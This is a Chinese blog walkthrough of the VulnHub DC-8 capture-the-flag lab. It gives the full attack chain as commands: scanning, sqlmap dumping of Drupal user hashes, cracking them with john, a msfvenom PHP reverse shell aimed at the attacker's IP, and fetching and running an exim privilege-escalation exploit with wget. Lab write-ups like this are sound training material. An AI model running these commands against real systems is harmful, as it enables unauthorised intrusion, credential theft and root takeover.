【DC8靶场通关详细记录】

最新推荐文章于 2024-03-28 19:46:32 发布
最新推荐文章于 2024-03-28 19:46:32 发布
阅读量1.1k 收藏 23
点赞数 31
分类专栏: DC靶场通关记录系列 文章标签: 网络 网络安全 笔记 经验分享 web安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46678448/article/details/135113258
版权

DC8靶场通过记录

环境搭建

  1. DC8主机靶场,点击下载
  2. 导入下载文件,如果报错点击重试
  3. 更改kali和DC8靶场的网络配置为统一的连接模式
  4. 靶场官网提示:需要提升到root权限查看唯一的flag

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

  arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -p- -A 192.168.223.131

image.png

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

 whatweb -v  192.168.223.131

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.131

image.png
image.png

查找漏洞

访问页面

  1. 进行目录访问,尝试页面点击,观察url变化

image.png
image.png

  1. 页面点击后url发生变化出现数字的变化,可以尝试sql注入
  2. 继续访问其他目录

数据库注入

  1. 数据库注入成功,显示该注入类型为:布尔盲注、时间盲注、显错注入、联合注入

image.png

  1. 爆破数据库
 sqlmap -u "http://192.168.223.131/?nid=1"  --dbs

image.png

  1. 爆破数据库表
sqlmap -u "http://192.168.223.131/?nid=1"  -D d7db --tables

image.png

  1. 爆破数据表中的列
sqlmap -u "http://192.168.223.131/?nid=1"  -D d7db -T users  --columns

image.png

  1. 查看用户名密码
sqlmap -u "http://192.168.223.131/?nid=1"  -D d7db -T users -C name,pass --dump

image.png

使用john解密登录

  1. 使用john解密

image.png

  1. 两个用户尝试登录,john用户登录成功

尝试写入php反弹shell获取shell

  1. 使用msf生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.129 lport=8888 -f raw -o 1.php
  1. 在网站内部找php代码写入点

image.png
image.png

  1. 将生成的反弹shell复制进去之后保存,等待shell不成功
  2. 再次复制反弹shell进去,填写view内容提交然后获取到shell

image.png

提权

  1. 尝试提权
sudo -l
uname -a
find / -perm -u=s -type f 2>/dev/null
  1. 通过搜索漏洞,看到了与find查找内容相似的漏洞脚本
searchsploit 4.9.0

image.png

  1. 确定要使用的而提权脚本
searchsploit exim

image.png

  1. 在kali开启http服务
python -m http.server

image.png

  1. 通过shell尝试查看使用的版本
exim4 --version

image.png

  1. 在有权限的目录下上传提取脚本
cd tmp
wget http://192.168.223.129:8000/46996.sh
ls -l
chmod 777 46.996.sh
./46996.sh

image.png

  1. 执行脚本未成功提权
whoami

image.png

  1. 查看脚本内容,再次使用其中的方式提权
./raptor_exim_wiz -m netcat
./exim4 -m netcat
./46996.sh -m netcat

image.png

  1. 脚本执行成功,提升权限为root
id
whoami
cd root
ls
cat flag.txt

image.png

总结

  1. 使用sqlmap进行sql注入
  2. msfvenom生成木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.129 lport=8888 -f raw -o 1.php
  1. 漏洞利用脚本的使用,根据脚本内的提示方法进行使用
榕小树
关注
  • 31
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1829
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
靶机9 DC-8(过程超详细
honest_gg的博客
09-26 2050
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
Vulhub 靶场训练 DC-8解析
黑战士的博客
02-24 1007
kali的IP地址:192.168.200.14DC-8的IP地址:192.168.200.13(一个flag)靶机和攻击机处于同一个网络方式:nat或桥接若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容。
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4663
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1089
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
GasCalc_AGA8—92DC_
09-29
Library calculating thermodynamic properties of nathural gas
DC8靶场渗透流程(超详细)
m0_64583632的博客
04-12 564
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3397
dc-8靶场详细渗透过程
DC8_靶场训练
JSH_CDX的博客
03-31 997
本篇文章是对DC靶场的实战,也是通关过程,希望这对你会有帮助
DC-8靶场实战
qq_42754807的博客
03-21 713
DC-9靶场实战
靶场练习第十六天~vulnhub靶场之dc-8
qq_57976347的博客
02-15 357
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.121 2.网站的信息收集 (1)靶机开放了80端口,先访问
DC-8靶场
mlws1900的博客
03-28 522
下载不了可以用迅雷下载。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2970
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
【DC-8靶场渗透】
一纸荒芜的博客
08-13 2005
dc-8靶场
vulnhub靶场之DC-8
qq_58091216的博客
01-14 1004
我们查看node,我们可以看到3行蓝色的字,我们一个一个进行访问,最后发现这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞。将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码。我们可以看到name和pass,我们想到前面的登录页面,我们进行爆破即可。我们可以看到报错了,可能存在报错注入,我们使用sqlmap进行测试。我们看到2个用户名和密码,但是密码是加密的,我们进行解密。
ssti-lab靶场通关
09-02
通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值